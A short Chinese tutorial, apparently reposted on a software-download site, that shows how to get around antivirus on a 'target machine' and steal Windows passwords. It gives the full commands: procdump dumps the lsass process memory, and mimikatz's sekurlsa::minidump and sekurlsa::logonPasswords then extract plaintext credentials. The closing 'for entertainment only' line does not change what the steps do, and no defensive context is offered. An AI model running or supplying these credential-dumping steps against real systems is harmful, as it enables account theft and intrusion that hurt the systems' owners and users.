众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码,但是很多情况下有杀软这种瘟神挡道,我们必须另想办法。
procdump是微软官方提供的一个小工具,在微软官方有下载
将工具拷贝到目标机器上执行如下命令(需要管理员权限)
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
获得一个lsass进程的内存dump文件lsass.dmp,下面我就们就要用mimikatz(注意是alpha版的mimikatz,否则没有这个命令可用)获得dump文件的明文密码了。
但要注意dump文件和mimikatz的版本对应关系,对应关系如图:
将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:
mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords full
大功告成,菜鸟言论,仅供娱乐。
第七下载提供文件管理软件下载,随着互联网的普及、信息流通的速度、强度和便捷度的加强,一方面人们享受到了前所未有的方便和迅捷,但另一方面也承受着信息爆炸所带来的压力。对于企业而言,信息化让电子文档、纸质...
网络辅助 / 826 KB
网络辅助 / 826 KB
网络辅助 / 454 KB
网络辅助 / 6.75 MB
网络辅助 / 50.12 MB
软件评论
请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!